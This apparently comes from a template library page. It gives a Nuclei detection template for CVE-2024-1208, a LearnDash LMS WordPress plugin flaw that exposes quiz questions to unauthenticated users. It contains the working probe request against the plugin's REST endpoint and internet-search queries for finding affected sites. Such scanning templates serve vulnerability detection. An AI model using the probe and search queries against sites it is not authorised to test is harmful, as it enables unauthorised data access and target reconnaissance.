LearnDash LMS < 4.10.3 - Sensitive Information Exposure
ID: CVE-2024-1208
Severity: medium
Author: ritikchaddha
Tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
Description
Section titled “Description”The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
YAML Source
Section titled “YAML Source”id: CVE-2024-1208
info: name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure author: ritikchaddha severity: medium description: | The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions. remediation: Fixed in 4.10.3 reference: - https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 - https://nvd.nist.gov/vuln/detail/CVE-2024-1208 - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1208 epss-score: 0.01217 epss-percentile: 0.85275 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: learndash product: learndash framework: wordpress shodan-query: http.html:/wp-content/plugins/sfwd-lms fofa-query: body=/wp-content/plugins/sfwd-lms publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/sfwd-question"
matchers-condition: and matchers: - type: word part: body words: - '"id":' - '"question_type":' - '"points_total":' condition: and
- type: word part: header words: - 'application/json'
- type: status status: - 200# digest: 4a0a0047304502210081ad408ec46c777dc7b9168a897868eedb9e1973c691ac4712cd5199fc396c48022010b515c62e11d2d9deb3044456f04dff57193484d48c549b6ff67f2d129fe224:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1208.yaml"